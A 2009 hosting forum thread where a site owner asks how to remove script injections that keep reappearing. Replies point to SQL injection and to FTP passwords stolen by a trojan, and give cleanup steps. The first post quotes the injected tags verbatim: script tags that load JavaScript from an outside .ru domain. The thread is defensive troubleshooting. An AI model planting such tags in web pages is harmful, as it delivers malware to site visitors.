Results 1 to 10 of 10
-
11-05-2009, 12:08 PM #1Temporarily Suspended
- Join Date
- May 2009
- Location
- Jammu & Kashmir
- Posts
- 234
How to get out malware/botnet virus from database/website
Problem Described by the client:
------I have created one website When i hosted in server automatically adds malware,
when viewing source code following lines are automatically added
<script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script>
How to get out of this malware line from my website.If i remove those lines and upload also again those line are added automatically how to solve this problem ?? how this line are added automatically ??--------
We tried to resolve the problem by re-creating the account, installing script with fresh files etc but after few hours this problem/error cames out.
I would be happy to receive your kind replies that might help us to resolve this problem.
Regards,
Wajdan
-
11-05-2009, 12:11 PM #2Web Hosting Guru
- Join Date
- Sep 2006
- Location
- Dallas, TX
- Posts
- 333
Is the web site generated from a database that is open to SQL injection attack?
-
11-05-2009, 12:15 PM #3Temporarily Suspended
- Join Date
- May 2009
- Location
- Jammu & Kashmir
- Posts
- 234
-
11-05-2009, 12:20 PM #4Web Hosting Guru
- Join Date
- Sep 2006
- Location
- Dallas, TX
- Posts
- 333
You need to find out how the site is being attacked and plug the hole.
Does the site use a back-end database?
-
11-05-2009, 12:22 PM #5Temporarily Suspended
- Join Date
- May 2009
- Location
- Jammu & Kashmir
- Posts
- 234
-
11-05-2009, 12:25 PM #6Web Hosting Guru
- Join Date
- Sep 2006
- Location
- Dallas, TX
- Posts
- 333
Take a look at this page:
http://en.wikipedia.org/wiki/SQL_injection
Make sure your systems are hardened against that.
-
11-05-2009, 12:27 PM #7Temporarily Suspended
- Join Date
- May 2009
- Location
- Jammu & Kashmir
- Posts
- 234
Would this help too? http://www.networkcloaking.com/ASPROX_Toolkit.pdf
Thanks for your kind replies. We're waiting for more suggestions and ways to remove such kind of attacks from the database/script.
-
11-05-2009, 12:30 PM #8Web Hosting Guru
- Join Date
- Sep 2006
- Location
- Dallas, TX
- Posts
- 333
That is someone trying to sell you something.
You need to understand how the attack happened.
Nobody will be able to tell you that from the outside.
-
11-05-2009, 02:51 PM #9Web Hosting Guru
- Join Date
- Dec 2003
- Location
- Pakistan
- Posts
- 344
In my experience, this happens when your FTP password is compromised by some Trojan horse by decrypting password from the FTP software (in most cases, CuteFTP was installed) and this code is injected from multiple locations (random proxies).
The solution is...
1. Cleanup PC with an updated version of anti-virus like AVG
2. Change FTP password
3. Download all files and remove malicious code (Dreamweaver's find/replace works like a charm)
4. Upload cleaned files
5. Update password to something really C00mPl3x string
6. use Google Webmaster tools to submit a review request to delist from Google's blacklist
7. Keep the password updated
It worked for every infected account for our clients!Muhammad Waseem
Inspedium Corporation (Pvt) Ltd.
InsPanel - Hosting Control Panel for Windows 2000/2003
-
11-05-2009, 11:15 PM #10Temporarily Suspended
- Join Date
- May 2009
- Location
- Jammu & Kashmir
- Posts
- 234
Similar Threads
-
Virus / Malware protection
By Mekhu in forum Web Hosting LoungeReplies: 15Last Post: 08-04-2009, 12:45 AM -
Website Malware Scanning
By C4talyst in forum Hosting Security and TechnologyReplies: 1Last Post: 04-09-2009, 05:27 AM -
Windows Anti-Virus / Anti-Malware / Firewall Applications
By -=BfA=- in forum Dedicated ServerReplies: 4Last Post: 07-17-2007, 02:46 PM -
How to tell if a website has had a virus embeded to it
By lexis2004 in forum Hosting Security and TechnologyReplies: 1Last Post: 08-18-2006, 11:24 PM -
Virus from visiting a website....
By Rewdog in forum Web Hosting LoungeReplies: 19Last Post: 12-10-2002, 04:15 PM